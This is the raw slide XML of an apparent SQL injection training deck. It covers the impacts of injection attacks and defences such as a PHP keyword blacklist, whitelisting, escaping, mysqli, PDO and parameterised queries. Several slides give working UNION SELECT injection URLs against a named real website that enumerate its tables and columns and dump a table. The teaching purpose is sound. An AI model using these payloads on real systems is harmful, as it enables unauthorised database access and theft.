                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),4,5 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=database()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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>),4,5 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=database()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baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8. http://www.raahauges.com/view-news.php?id=null union all select 1,2,group_concat(date,0x3a,time,0x3a,title,0x3a,details),4,5 from events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i="1"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i="0"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91185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Authentication Bypass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This attack allows an attacker to log on to an application, potentially with administrative privileges, without supplying a valid username and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>password.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Disclosure:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> This attack allows an attacker to obtain, either directly or indirectly, sensitive information in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>database.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Data Integrity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> This attack involves the alteration of the contents of a database. An attacker could use this attack to deface a web page or more likely to insert malicious content into otherwise innocuous web pages. This technique has been demonstrated via the attacks that are described </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" u="sng" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Mass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> exploits with SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> at the SANS Internet Storm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Center.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Availability of Data:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> This attack allows an attacker to delete information with the intent to cause harm or delete log or audit information in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>database.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> Command Execution:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Performing command execution through a database can allow an attacker to compromise the host operating system. These attacks often leverage an existing, predefined stored procedure for host operating system command execution. The most recognized variety of this attack uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> stored procedure that is common to Microsoft SQL Server installations or leverages the ability to create an external procedure call on Oracle databases.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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365629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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="664598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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1526634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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237435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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41741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protected function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CheckSqlInjection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userInput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 =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"alter", "begin", "cast", "create", "cursor", "declare", "delete",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"drop", "exec", "execute", "fetch", "insert", "kill", "open",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"select", "sys", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysobjects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syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>", "table",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"&lt;script", "&lt;/script", "--", "/*", "*/",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for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0;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&lt; count($</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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>strpos</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strtolower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userInput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true){ return true;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return false;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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3393351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drop their update table using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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> injection so they delete my account and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wanna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> kill me</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3833575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C3ED275-7153-994E-99D9-5909A673DFFD}"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04E6C61-ACAA-C24F-8F8A-3369455B37E6}"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6081A34F-7B18-5F4C-91E8-15A0B2DB6558}"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5608FE6-F300-CA4F-8754-F30BE5DB2C02}"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5907637-DE80-574B-9387-2B6489C2DDA9}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28,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B29FAD1F-AC8E-0749-90DA-216529CFB27D}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28,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C14BE83E-0675-4D45-9588-77AC2712A327}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28, 2015</a:t>
            </a:fld>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A00E04D-79B7-6D41-BB08-435F493F6C30}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28, 2015</a:t>
            </a:fld>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6027C3B-ABCB-0249-A4FA-2A37469F1C4E}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28, 2015</a:t>
            </a:fld>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F7263A-B695-E045-B371-427CE3BBD559}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28,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88F21D5-8A27-D144-BD56-2E0DA25B6EEB}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28,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3634E6B9-A6FC-5D46-BEFB-60D025A07933}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>Tuesday, April 28,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dirty="0" smtClean="0"/>
              <a:t>www.qsoftvietnam.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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www.modsecurity.org/"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www.imperva.com/Products/WebApplicationFirewal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owasp.org/index.php/Top_10_2013-T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sqlinjection/index.php"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sqlinjection/index2.php"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sqlinjection/index3.php"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8438" y="1364451"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Constantia" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Constantia" pitchFamily="18" charset="0"/>
            </a:endParaRP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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="150829" y="3601434"/>
            <a:ext cx="8862248" cy="2148918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152994" y="246061"/>
            <a:ext cx="4085276" cy="3355373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Blacklist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Not a good idea</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="657028" y="3137456"/>
            <a:ext cx="7148365" cy="2878753"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37830281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11</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Whitelist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Opposite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blacklist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Allows specified values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Good for radio button list, fixed dropdown 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For a free form fields =&gt; a bad idea</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19514525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12</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SQL parameters</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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4456954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13</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mysql_query</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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) =&gt; is deprecated in PHP 5.5.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="288651" y="2604095"/>
            <a:ext cx="8566697" cy="1213762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9462136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14</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mysqli_query</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10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191928" y="2161034"/>
            <a:ext cx="8795602" cy="3862694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32474895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15</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PDO</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8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="129966" y="2055376"/>
            <a:ext cx="8857596" cy="4195338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8924589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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="191928" y="801215"/>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Framework</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10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="1729921"/>
            <a:ext cx="7379616" cy="4868228"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37658355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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="88232" y="102746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Doctrine</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6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="406200" y="2304956"/>
            <a:ext cx="8331599" cy="3973295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13662116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18</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Why it works?</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Old way: send mixing of query and data</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New idea: query &amp; data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>separately</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8485047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Monday, May 04,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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125944" y="857775"/>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Tips</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1781667"/>
            <a:ext cx="8229600" cy="4721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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validation first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(mail, phone,… types)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check/Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
